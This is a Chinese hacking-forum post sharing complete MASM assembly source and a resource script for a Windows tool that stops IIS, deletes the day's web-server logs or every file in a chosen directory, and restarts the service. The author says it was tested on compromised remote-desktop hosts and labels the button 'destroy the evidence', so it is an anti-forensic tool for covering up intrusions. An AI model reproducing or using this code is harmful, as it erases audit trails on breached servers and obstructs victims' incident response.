[原创]系统日志删除工具(win32asm开源工具)
文章作者:ASM  信息来源:邪恶八进制信息安全团队([url]http://www.eviloctal.com/[/url])
[color=red]注:本篇文章首发于红狼安全小组,今由作者转发到邪恶八进制[/color]
写这个工具的目的:借助编写代码来探索未知和巩固自己所学........
把源码发出来,估计刚学win32汇编的人能看得着 :)
如果代码写得倒了你的胃口,那我真是不好意思,哈
图片:
[attach]9831[/attach]
完整代码:
[code]
;******************************************************
;程序编写by Asm
;日期:2006-12-11日凌晨
;出处:[url]http://www.wolfexp.net/[/url](红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组([url]http://www.wolfexp.net/[/url])
;******************************************************
.386                          ; 32-bit code, MASM syntax, stdcall Win32 ABI
.model flat, stdcall
option casemap :none          ; symbol names are case-sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include shell32.inc
includelib shell32.lib
; Resource / control ids. Each value must agree with the #define of the
; same name in the .rc script; the dialog procedure switches on them.
ICO_MAIN equ 1000             ; icon resource
DLG_MAIN equ 1000             ; main dialog resource (same number, different type)
IDC_Open equ 1001             ; "browse" button
IDC_RiZhi equ 1002            ; edit control showing the log directory
IDC_stop equ 1003             ; "stop IIS" button
IDC_Del equ 1004              ; checkbox: delete today's logs (acts on click)
IDC_WeiZhao equ 1005          ; checkbox: delete all files (acts on click)
IDC_start equ 1006            ; "start IIS" button
IDC_Out equ 1007              ; exit button
IDC_About equ 1008            ; about button
IDC_Wolf equ 1009             ; opens the author's URL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hwnd dd ?                     ; not referenced in the visible code
hInstance dd ?                ; module handle, set once at `start`
.data
bbf db 256 dup(0)             ; directory chosen in the folder browser (re-read from the edit control)
FileName db 256 dup(0)        ; full path of the current *.log entry: bbf + '\' + cFileName
FileNamePattern db 156 dup(0) ; search pattern bbf + '\*.log'; never re-zeroed, and lstrcat has no bounds check
binfo BROWSEINFO <>           ; parameters for SHBrowseForFolder
szFile db '\*.log',0          ; suffix appended to bbf for the per-day delete
szXie db '\',0                ; path separator
szBuffer db 256 dup(?)        ; not referenced in the visible code
lpCreationTime FILETIME <?>   ; creation time of the file being examined (global, overwritten per file)
szStopIIs db 'iisreset -stop',0   ; command line for CreateProcess (must be writable, hence .data)
stStartUp STARTUPINFO <?>     ; shared by _stopIIS / _startIIS
stProcInfo PROCESS_INFORMATION <?> ; child handles land here and are never closed
lpSystemTime SYSTEMTIME <?>   ; "now" in UTC, from GetSystemTime
szWeiZhao db 256 dup(?)       ; not referenced in the visible code
szFile1 db '\*.*',0           ; suffix appended to bbf for the delete-everything path
delallfile db 156 dup(0)      ; search pattern bbf + '\*.*'; same sizing/zeroing caveats as FileNamePattern
allfile db 256 dup (0)        ; full path of the current *.* entry
szStartIIs db 'iisreset -start',0 ; command line for CreateProcess
szTitle db '关于工具的一点说明',0 ; about-box title (runtime string, left as authored)
szCaption db '在删除日志之前请先停止IIS服务 :)',0ah
db '此工具的编写是一次练习,只是为了借助编写代码来探索未知和巩固自己所学',0ah
db '我在3389肉鸡上测试通过,但愿你使用的时候不要倒了你的胃口 :) ',0ah
db '如果你有什么好办法,请到红狼安全小组找我交流,我很荣幸',0ah
db 'By Asm 红狼安全小组 [C.R.S.T]',0ah
db '[url]http://www.wolfexp.net/[/url]',0ah,0
szWolf db '[url]http://www.wolfexp.net/[/url]',0 ; passed verbatim to ShellExecute
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;打开目录对话框
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _GetOpenDirectoryName
; Shows the shell "browse for folder" dialog and stores the chosen path
; in the global buffer bbf.
; In:    none (binfo is zeroed, so the owner window is NULL and the root
;        is the desktop)
; Out:   bbf = selected directory; the PIDL from SHBrowseForFolder is not
;        checked for NULL, so on cancel bbf is presumably left as it was
; Clobb: flags only — all general registers are saved/restored by
;        pushad/popad
; Note:  the PIDL is never freed.
;-----------------------------------------------------------------------
_GetOpenDirectoryName proc
pushad ; save all general-purpose registers
invoke RtlZeroMemory,addr binfo,sizeof binfo ; hwndOwner = NULL, pidlRoot = NULL, no callback
mov binfo.ulFlags,BIF_RETURNFSANCESTORS or BIF_RETURNONLYFSDIRS ; file-system directories only
invoke SHBrowseForFolder,addr binfo ; eax = PIDL, or NULL if cancelled (not checked)
invoke SHGetPathFromIDList,eax,addr bbf ; bbf = path text for the PIDL; return value ignored
popad ; restore all registers
ret
_GetOpenDirectoryName endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;删除日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _DeleteFile
; Enumerates *.log in the directory held in bbf (this directory only, not
; recursive), builds each entry's full path in the global FileName and
; calls _GetFileTime, which deletes the file when its creation
; day-of-month equals ebx.
; In:    bbf = directory path
;        ebx = today's day-of-month — an implicit register argument set by
;              _ProcDlgMain and consumed inside _GetFileTime
; Out:   eax undefined; FileName and FileNamePattern overwritten
; Clobb: eax, ecx, edx (Win32 calls); edi is preserved via `uses`
; Notes: - FileNamePattern is never zeroed here, so a second invocation
;          appends the path again and the search will no longer match.
;        - lstrcat has no length check and FileNamePattern is 156 bytes
;          while bbf can hold 255 characters: a long path overruns it.
;        - the hWnd local is unused.
;-----------------------------------------------------------------------
_DeleteFile proc uses edi
LOCAL finddata:WIN32_FIND_DATA
LOCAL hFindFile:DWORD
LOCAL hWnd:DWORD
invoke lstrcat,addr FileNamePattern,addr bbf ; FileNamePattern = <dir>
invoke lstrcat,addr FileNamePattern,addr szFile ; FileNamePattern = <dir>\*.log
invoke FindFirstFile,addr FileNamePattern,addr finddata ; start the *.log enumeration
.if eax!=INVALID_HANDLE_VALUE ; at least one match?
mov hFindFile,eax
.repeat
invoke RtlZeroMemory,addr FileName,sizeof FileName ; FileName is rebuilt from scratch for every entry
invoke lstrcat,addr FileName,addr bbf ; FileName = <dir>
invoke lstrcat,addr FileName,addr szXie ; FileName = <dir>\
lea eax,finddata.cFileName ; eax -> name of the entry just found
invoke lstrcat,addr FileName,eax ; FileName = <dir>\<name>
call _GetFileTime ; compare creation day with ebx and delete on match
invoke FindNextFile,hFindFile,addr finddata
.until eax == FALSE ; no more entries
invoke FindClose,hFindFile
.endif
ret
_DeleteFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _GetFileTime
; Opens the file named by the global FileName, reads its creation time
; and deletes it when the creation day-of-month equals ebx.
; In:    FileName = full path of the file
;        ebx      = day-of-month to match (implicit register argument,
;                   loaded in _ProcDlgMain from GetSystemTime)
; Out:   eax undefined; lpCreationTime (global) overwritten
; Clobb: eax, ecx, edx, flags
; Notes: - Only wDay is compared: a file created on the same day-of-month
;          in any other month or year is deleted as well.
;        - Both sides are UTC (GetSystemTime and FileTimeToSystemTime do
;          no local-time conversion), so "today" is the UTC day.
;        - The handle is closed only on the delete path; when the day
;          does not match, or the time conversion fails, the file stays
;          open until the process exits.
;-----------------------------------------------------------------------
_GetFileTime proc
local @hFile:DWORD
local @stUTC:SYSTEMTIME
invoke CreateFile,addr FileName,\ ; open for read, share-read only
GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax != INVALID_HANDLE_VALUE ; opened? (fails while another process holds the file with incompatible sharing — presumably why the UI asks to stop IIS first)
mov @hFile,eax ; keep the handle
invoke GetFileTime,@hFile,addr lpCreationTime,NULL,NULL ; creation time only; last-access / last-write not requested
invoke FileTimeToSystemTime,addr lpCreationTime,addr @stUTC ; FILETIME -> SYSTEMTIME, still UTC
.if eax != NULL ; conversion succeeded?
movzx ecx,@stUTC.wDay ; ecx = creation day-of-month, zero-extended to 32 bits
.if ecx == ebx ; same day-of-month as the caller's "today"?
invoke CloseHandle,@hFile ; close first, otherwise the open handle blocks the delete
invoke DeleteFile,addr FileName ; delete; result not checked
.endif
.endif
.endif
ret
_GetFileTime endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _stopIIS
; Spawns "iisreset -stop" as a child process. No application name is
; given, so iisreset is located through CreateProcess's normal search.
; In:    none
; Out:   eax = CreateProcess result (ignored by the caller)
; Clobb: eax, ecx, edx; stStartUp / stProcInfo (globals) overwritten
; Notes: the call does not wait for the child, and the process/thread
;        handles placed in stProcInfo are never closed. The child process
;        creation and the resulting service stop are both events Windows
;        ordinarily records, so this step is visible to monitoring.
;-----------------------------------------------------------------------
_stopIIS proc
invoke GetStartupInfo,addr stStartUp ; inherit this process's startup settings
invoke CreateProcess,NULL,addr szStopIIs,NULL,NULL,NULL,\
NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ; no handle inheritance, current directory, default environment
ret
_stopIIS endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _startIIS
; Spawns "iisreset -start" as a child process; mirror image of _stopIIS.
; In:    none
; Out:   eax = CreateProcess result (ignored by the caller)
; Clobb: eax, ecx, edx; stStartUp / stProcInfo (globals) overwritten
; Notes: same caveats as _stopIIS — no wait, handles never closed.
;-----------------------------------------------------------------------
_startIIS proc
invoke GetStartupInfo,addr stStartUp ; inherit this process's startup settings
invoke CreateProcess,NULL,addr szStartIIs,NULL,NULL,NULL,\
NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ; no handle inheritance, current directory, default environment
ret
_startIIS endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _DeleteAllFile
; Enumerates *.* in the directory held in bbf (this directory only, not
; recursive) and calls DeleteFile on every entry unconditionally.
; In:    bbf = directory path
; Out:   eax undefined; delallfile and allfile overwritten
; Clobb: eax, ecx, edx (Win32 calls); edi is preserved via `uses`
; Notes: - "." / ".." and subdirectories are enumerated too; DeleteFile
;          fails on those and the result is ignored.
;        - delallfile is never re-zeroed and is only 156 bytes with an
;          unbounded lstrcat — same issue as FileNamePattern.
;        - the hWnd local is unused.
;-----------------------------------------------------------------------
_DeleteAllFile proc uses edi
LOCAL finddata:WIN32_FIND_DATA
LOCAL hFindFile:DWORD
LOCAL hWnd:DWORD
invoke lstrcat,addr delallfile,addr bbf ; delallfile = <dir>
invoke lstrcat,addr delallfile,addr szFile1 ; delallfile = <dir>\*.*
invoke FindFirstFile,addr delallfile,addr finddata ; start the enumeration
.if eax!=INVALID_HANDLE_VALUE ; at least one entry?
mov hFindFile,eax
.repeat
invoke RtlZeroMemory,addr allfile,sizeof allfile ; allfile rebuilt from scratch for every entry
invoke lstrcat,addr allfile,addr bbf ; allfile = <dir>
invoke lstrcat,addr allfile,addr szXie ; allfile = <dir>\
lea eax,finddata.cFileName ; eax -> name of the entry just found
invoke lstrcat,addr allfile,eax ; allfile = <dir>\<name>
invoke DeleteFile,addr allfile ; delete; result not checked
invoke FindNextFile,hFindFile,addr finddata
.until eax == FALSE ; no more entries
invoke FindClose,hFindFile
.endif
ret
_DeleteAllFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;主程序代码从这里开始
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _ProcDlgMain
; Dialog procedure for DLG_MAIN (stdcall DLGPROC, called by the dialog
; manager).
; In:    hWnd, wMsg, wParam, lParam — standard DLGPROC arguments
; Out:   eax = TRUE when the message was handled, FALSE otherwise
; Clobb: eax, ecx, edx; ebx / edi / esi preserved via `uses`
; Notes: - wParam is compared as a whole, so only notifications whose
;          HIWORD is 0 (BN_CLICKED) can match a control id.
;        - The two AUTOCHECKBOX controls are handled like buttons: a
;          click runs the corresponding delete right away, and their
;          checked state is never queried.
;        - ebx is loaded here as an implicit argument for _GetFileTime.
;-----------------------------------------------------------------------
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL ; end the modal dialog; DialogBoxParam returns in `start`
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN ; eax = icon handle (NULL not checked)
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
.elseif eax == WM_COMMAND
mov eax,wParam ; whole wParam: LOWORD = control id, HIWORD = notification code
.if eax == IDC_Open
call _GetOpenDirectoryName ; fills bbf via the folder browser
invoke SetDlgItemText,hWnd,IDC_RiZhi,addr bbf ; show it in the edit control
invoke GetDlgItemText,hWnd,IDC_RiZhi,addr bbf,sizeof bbf ; read it back — the only place the edit text is read
.elseif eax == IDC_stop
call _stopIIS
.elseif (eax == IDC_Del)||(eax == IDOK)
invoke GetSystemTime,addr lpSystemTime ; current date/time in UTC
xor ebx,ebx ; redundant: movzx below already zero-extends
movzx ebx,lpSystemTime.wDay ; ebx = today's day-of-month, consumed by _GetFileTime
call _DeleteFile
.elseif (eax == IDC_WeiZhao)||(eax == IDOK)
call _DeleteAllFile ; (the IDOK alternative above is unreachable: IDOK was matched by the previous branch)
.elseif eax == IDC_start
call _startIIS
.elseif eax == IDC_Out
invoke ExitProcess,eax ; exit code is IDC_Out (1007), not 0
.elseif eax == IDC_About
invoke MessageBox,NULL,addr szCaption,addr szTitle,MB_OK
.elseif eax == IDC_Wolf
invoke ShellExecute,0,0,addr szWolf,0,0,SW_SHOW ; open the URL with its default handler
.endif
.else
mov eax,FALSE ; not handled: let the default dialog handling run
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; Entry point: record the module handle, run DLG_MAIN modally, exit 0.
;-----------------------------------------------------------------------
start:
invoke GetModuleHandle,NULL ; eax = handle of this executable
mov hInstance,eax ; used by LoadIcon and DialogBoxParam
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL ; returns only after EndDialog
invoke ExitProcess,NULL ; exit code 0 (IDC_Out exits earlier with a different code)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
[/code]
[code]
RC资源脚本 :
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include <resource.h>
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
// Resource / control ids. Each value must agree with the `equ` of the
// same name in the assembler source, whose dialog procedure switches on them.
#define ICO_MAIN 1000 // icon
#define DLG_MAIN 1000 // main dialog (same number as the icon; different resource type)
#define IDC_Open 1001 // "browse" button
#define IDC_RiZhi 1002 // edit control holding the log directory
#define IDC_stop 1003 // "stop IIS" button
#define IDC_Del 1004 // checkbox: delete today's logs (the dialog procedure acts on the click itself)
#define IDC_WeiZhao 1005 // checkbox: delete all files (likewise acts on the click)
#define IDC_start 1006 // "start IIS" button
#define IDC_Out 1007 // exit button
#define IDC_About 1008 // about button
#define IDC_Wolf 1009 // opens the author's URL
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN ICON "test.ico"
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
// Main dialog, 250 x 116 dialog units.
DLG_MAIN DIALOG 0, 0, 250, 116
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "日志删除工具 By Asm 红狼安全小组[C.R.S.T] "
FONT 9, "宋体"
STYLE 0x14CA0000 // second STYLE statement; appears to override the symbolic one above — confirm with the resource compiler in use
EXSTYLE 0x00000001
{
GROUPBOX "删除选项", -1,13,10,224,85
LTEXT "填写日志目录:", -1,16,33,54,15
EDITTEXT IDC_RiZhi, 71,32,88,14, ES_AUTOHSCROLL | WS_BORDER | WS_TABSTOP
LTEXT "删除当天日志:", -1,19,50,53,8
AUTOCHECKBOX "" IDC_Del,74,51,9,9 // WM_COMMAND with IDC_Del runs the per-day delete immediately
LTEXT "删除全部日志:", -1,84,50,53,8
AUTOCHECKBOX "" IDC_WeiZhao,139,50,9,9 // WM_COMMAND with IDC_WeiZhao runs the delete-all immediately
PUSHBUTTON "开始 ""毁尸灭迹""",IDOK,160,70,72,15 // IDOK is routed to the per-day delete only
PUSHBUTTON "浏览",IDC_Open,162,32,23,15
PUSHBUTTON "暂停IIS服务",IDC_stop,188,32,44,15
PUSHBUTTON "恢复IIS服务",IDC_start,188,50,45,15
PUSHBUTTON "退出",IDC_Out,120,70,38,14
PUSHBUTTON "关于程序",IDC_About,80,70,38,15
PUSHBUTTON "红狼安全小组",IDC_Wolf,19,70,60,15
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[/code]